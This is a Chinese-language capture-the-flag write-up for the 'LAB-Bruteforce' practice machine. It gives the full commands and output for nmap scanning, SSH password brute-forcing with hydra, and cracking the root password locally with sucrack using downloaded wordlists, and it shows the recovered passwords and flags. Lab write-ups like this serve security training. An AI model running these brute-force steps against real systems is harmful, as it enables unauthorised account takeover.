标签： 渗透

信息搜集

主机扫描

arp-scan -l

端口扫描

┌──(root㉿kali)-[/usr/share/seclists]
└─# nmap -sV -p- -Pn  192.168.56.91  
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-27 10:19 EDT
Nmap scan report for 192.168.56.91
Host is up (0.00028s latency).
Not shown: 65531 closed tcp ports (reset)
PORT      STATE SERVICE     VERSION
22/tcp    open  ssh         OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
10000/tcp open  http        MiniServ 2.021 (Webmin httpd)
19000/tcp open  netbios-ssn Samba smbd 4.6.2
19222/tcp open  netbios-ssn Samba smbd 4.6.2
MAC Address: 08:00:27:50:8A:52 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

拿取shell

smb端口没发现什么有用的东西，于是就ssh爆破一下，看能不能爆破出来

hydra -l andrea -P /usr/share/wordlists/seclists/Passwords/xato-net-10-million-passwords-1000000.txt ssh://192.168.56.91 

[STATUS] 112.00 tries/min, 336 tries in 00:03h, 9664 to do in 01:27h, 16 active
[STATUS] 105.14 tries/min, 736 tries in 00:07h, 9264 to do in 01:29h, 16 active
[22][ssh] host: 192.168.56.91   login: andrea   password: awesome
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 4 final worker threads did not complete until end.
[ERROR] 4 targets did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-04-27 11:55:06

d5eb7d8b6f57c295e0bedf7eef531360

提权

1. 查看.bash_history

andrea@LAB-Bruteforce:~$ cat .bash_history
passwd
cd ..
ls
nano passwords.txt
sudo nano passwords.txt
su –
clear
exit
nano user.txt
clear
sudo -l
passwd
su –
su –
ls
cat user.txt
cd ..
ls
cd mattia
ls
cd testFolder
ls
cat REa
cat README.txt
cd ..
cd Desktop
ls
cd ..
cd .
find / -name passw.
find / -name passw*.txt
clear
find / -name *.txt
find / -name *.txt | grep -v “Permission”
find / -name *.txt | grep -v “Permission denied”
find / -name *.txt & grep -v “Permission denied”
find / -name *.txt && grep -v “Permission denied”
clear
ls
cd ..
ls
cd home
ls
cd mattia
ls
find / -name *.txt
ls
find / -name *.txt
exit

2. sudo -l 无权限

3. 定时文件什么都没有

4.下载linpeas.sh，一点思路没有(悲，看师傅的wp发现需要利用sucrack，爆破root的密码，嘶，真没想到

kali:
apt insatll sucrack
cd /usr/bin
python3 -m http.server 
靶机:
/tmp目录下
wget ip/sucrack
chmod +x 777 sucrack

字典也下上，不然怎么爆破

ndrea@LAB-Bruteforce:/tmp$ wget http://192.168.56.205:8000/xato-net-10-million-passwords-10000.txt
--2024-04-27 19:16:33--  http://192.168.56.205:8000/xato-net-10-million-passwords-10000.txt
Connecting to 192.168.56.205:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 76497 (75K) [text/plain]
Saving to: ‘xato-net-10-million-passwords-10000.txt’

xato-net-10-million-passwords-10000. 100%[===================================================================>]  74.70K  --.-KB/s    in 0.003s  

2024-04-27 19:16:33 (23.1 MB/s) - ‘xato-net-10-million-passwords-10000.txt’ saved [76497/76497]

andrea@LAB-Bruteforce:/tmp$ chmod +x xato-net-10-million-passwords-10000.txt 
andrea@LAB-Bruteforce:/tmp$ ./sucrack -u root -w 123 xato-net-10-million-passwords-10000.txt 
password is: 1998

andrea@LAB-Bruteforce:~$ su root
Password: 
root@LAB-Bruteforce:/home/andrea# ls
user.txt
root@LAB-Bruteforce:/home/andrea# cd /root
root@LAB-Bruteforce:~# ls
root.txt  vboxpostinstall.sh
root@LAB-Bruteforce:~# cat root.txt 
Congratulations.

d2f74ec1ca3e40f6fa07f62d42eb9ea5

总结：

1. 字典的选择，选择合适的字典太重要了，怎么选择字典是个问题
2. 没想到这次需要sucrack爆破真没想到，也没有看到靶机内部提示，看来是跟靶机的名称是想匹配的，爆破实验室，不断地爆破，算是学会使用了一个新工具